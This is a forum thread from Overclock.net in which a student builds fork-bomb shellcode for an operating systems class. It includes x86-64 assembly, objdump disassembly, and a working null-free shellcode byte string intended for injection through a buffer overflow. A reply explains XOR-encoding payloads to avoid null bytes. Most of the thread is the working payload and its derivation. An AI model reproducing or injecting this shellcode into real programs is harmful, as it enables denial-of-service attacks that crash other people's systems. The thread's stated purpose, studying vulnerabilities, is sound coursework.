Overclock.net › Forums › Software, Programming and Coding › Coding and Programming › [ASM / C ] Forkbomb Shellcode
New Posts  All Forums:Forum Nav:

[ASM / C ] Forkbomb Shellcode

post #1 of 4
Thread Starter 
This is for school, Operating Systems class (studying vulnerabilities) So no, don't be scared I wont be bothering people with it.


Basically doing a shellcode for a forkbomb program to introduce via a buffer overflow into a target program.

ASM Code:
Code:
section .text
global _start
 
_start:
mov rbx,57             ; Fork() is x64 syscall #57
                       ; 'mov reg,reg' is always faster than
                       ; 'mov reg,imm', so we stick the syscall
                       ; index in a register that will not change
                       ; and use it throughout our forkbomb loop
forkbomb:
mov rax,rbx            ; Copy the syscall index to rax
syscall                ; Invoke the system call
jmp short forkbomb     ; ... and do it again, forever

Dissasembly via objdump:
Code:
<_start>
0: 48 bb 39 00 00 00 00 mov $0x39, %rbx
7: 00 00 00

<forkbomb>:
a: 48 89 d8 mov %rbx, %rax
d: 0f 05 syscall
f: eb f9 jmp a <forkbomb>

Having that, my shellcode should be:
Code:
\x48\xbb\x39\x00\x00\x00\x00\x00\x00\x00\x48\x89\xd8\x0f\x05\xeb\xf9

However, because I will be using it inside a buffer it shouldn't have nulls in it (else the buffer will null terminate).

My question is, how can I turn those x00 into something so it won't be null terminated? I've read some strange XOR techniques but I honestly don't understand them enough to use them.
Back in Black
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Phenom II X4 965 BE (C3) Biostar TA790GX A3+ Sapphire HD 5770 (v2) CORSAIR XMS3 4GB DDR3 
Hard DriveOptical DriveOSMonitor
WD Caviar Black 640GB Sony Optiarc CD/DVD RW Windows 7 Ultimate x64 NEC MultiSync LCD 1960NXi 
KeyboardPowerCaseMouse
Microsoft Comfort Curve Keyboard 2000 Corsair 650TX Cooler Master Storm Scout Logitech MX 400 Laser 
  hide details  
Reply
Back in Black
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Phenom II X4 965 BE (C3) Biostar TA790GX A3+ Sapphire HD 5770 (v2) CORSAIR XMS3 4GB DDR3 
Hard DriveOptical DriveOSMonitor
WD Caviar Black 640GB Sony Optiarc CD/DVD RW Windows 7 Ultimate x64 NEC MultiSync LCD 1960NXi 
KeyboardPowerCaseMouse
Microsoft Comfort Curve Keyboard 2000 Corsair 650TX Cooler Master Storm Scout Logitech MX 400 Laser 
  hide details  
Reply
post #2 of 4
Thread Starter 
Got the solution, after making my brain mush from all the thinking I decided to send my teacher and email, turns out I was using 64 bit instructions when they aren't necessary.

I'll post my results just in case somebody in the future google search finds this thread and has the same problem.

Edit: Shellcode turned out as
Code:
\x48\x31\xdb\xb3\x39\x48\x89\xd8\x0f\x05\xeb\xf9

I'll post the assembler instructions later, don't want my classmates copying me tongue.gif
Edited by Chris++ - 11/29/11 at 4:13pm
Back in Black
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Phenom II X4 965 BE (C3) Biostar TA790GX A3+ Sapphire HD 5770 (v2) CORSAIR XMS3 4GB DDR3 
Hard DriveOptical DriveOSMonitor
WD Caviar Black 640GB Sony Optiarc CD/DVD RW Windows 7 Ultimate x64 NEC MultiSync LCD 1960NXi 
KeyboardPowerCaseMouse
Microsoft Comfort Curve Keyboard 2000 Corsair 650TX Cooler Master Storm Scout Logitech MX 400 Laser 
  hide details  
Reply
Back in Black
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Phenom II X4 965 BE (C3) Biostar TA790GX A3+ Sapphire HD 5770 (v2) CORSAIR XMS3 4GB DDR3 
Hard DriveOptical DriveOSMonitor
WD Caviar Black 640GB Sony Optiarc CD/DVD RW Windows 7 Ultimate x64 NEC MultiSync LCD 1960NXi 
KeyboardPowerCaseMouse
Microsoft Comfort Curve Keyboard 2000 Corsair 650TX Cooler Master Storm Scout Logitech MX 400 Laser 
  hide details  
Reply
post #3 of 4
You do sometimes have to encode null bytes in shellcode. A common technique is XORring your shellcode with a single byte ahead of time, and then writing shellcode that can XOR that shellcode in-place and then jump to it, without a null byte. Do you know what XOR does?
Edited by Coma - 11/30/11 at 3:17pm
Akiyama Mio
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6420 @ stock, 0.98v Asus P5N-E SLI Gainward GTX 460 1GB @ 800/1600/1900 2x2GB Kingston @ 800MHz 5-5-5-15 2T 
Hard DriveOptical DriveOSMonitor
WD 250GB, 320GB SATA/3, 16MB Cache, Seagate 1TB LG GSA-H62N 18x SATA Ubuntu 9.10 x86 & Win7 x86 Asus VW222U 
KeyboardPowerCase
Logitech Classic Corsair 650HX NZXT Apollo Black 
  hide details  
Reply
Akiyama Mio
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6420 @ stock, 0.98v Asus P5N-E SLI Gainward GTX 460 1GB @ 800/1600/1900 2x2GB Kingston @ 800MHz 5-5-5-15 2T 
Hard DriveOptical DriveOSMonitor
WD 250GB, 320GB SATA/3, 16MB Cache, Seagate 1TB LG GSA-H62N 18x SATA Ubuntu 9.10 x86 & Win7 x86 Asus VW222U 
KeyboardPowerCase
Logitech Classic Corsair 650HX NZXT Apollo Black 
  hide details  
Reply
post #4 of 4
Thread Starter 
Yeah I do understand what XOR does, and that approach seems quite easy, but wouldn't it require to find some bigger buffers to exploit?

The "strange XOR techniques" I was talking about earlier where XORing a couple of registers that I didn't know much about [al] (I'm not that familiar with ASM, even less so in x86-64), turns out they where just a small part of [rbx] that can be called individually.

Anyways, I managed to fix it and execute it properly so now I can forkbomb my PC all day tongue.gif
Back in Black
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Phenom II X4 965 BE (C3) Biostar TA790GX A3+ Sapphire HD 5770 (v2) CORSAIR XMS3 4GB DDR3 
Hard DriveOptical DriveOSMonitor
WD Caviar Black 640GB Sony Optiarc CD/DVD RW Windows 7 Ultimate x64 NEC MultiSync LCD 1960NXi 
KeyboardPowerCaseMouse
Microsoft Comfort Curve Keyboard 2000 Corsair 650TX Cooler Master Storm Scout Logitech MX 400 Laser 
  hide details  
Reply
Back in Black
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Phenom II X4 965 BE (C3) Biostar TA790GX A3+ Sapphire HD 5770 (v2) CORSAIR XMS3 4GB DDR3 
Hard DriveOptical DriveOSMonitor
WD Caviar Black 640GB Sony Optiarc CD/DVD RW Windows 7 Ultimate x64 NEC MultiSync LCD 1960NXi 
KeyboardPowerCaseMouse
Microsoft Comfort Curve Keyboard 2000 Corsair 650TX Cooler Master Storm Scout Logitech MX 400 Laser 
  hide details  
Reply
New Posts  All Forums:Forum Nav:
  Return Home
  Back to Forum: Coding and Programming
Overclock.net › Forums › Software, Programming and Coding › Coding and Programming › [ASM / C ] Forkbomb Shellcode